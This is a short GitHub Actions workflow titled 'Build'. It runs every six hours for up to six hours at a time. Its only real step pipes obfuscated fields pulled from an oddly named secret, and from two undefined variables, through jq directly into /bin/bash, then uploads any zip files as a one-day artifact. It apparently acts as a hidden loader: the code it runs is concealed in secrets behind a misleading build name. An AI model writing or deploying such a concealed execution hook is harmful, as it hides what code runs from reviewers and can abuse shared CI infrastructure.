name: Build
on:
  workflow_dispatch:

  schedule:
    - cron: '4 3,9,15,21 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  main:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Process
        env:
          nvvr5: ${{ secrets.nvvr5 }}
        run: |
          printf '%s' "$nvvr5" | jq -r .udshk28544 | /bin/bash
          echo $qjeke454 | jq -r .r96 | /bin/bash
          echo $eegr98 | jq -r .fye609 | /bin/bash

      - name: Archive output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: P2VCtffC
          path: "*.zip"
          retention-days: 1
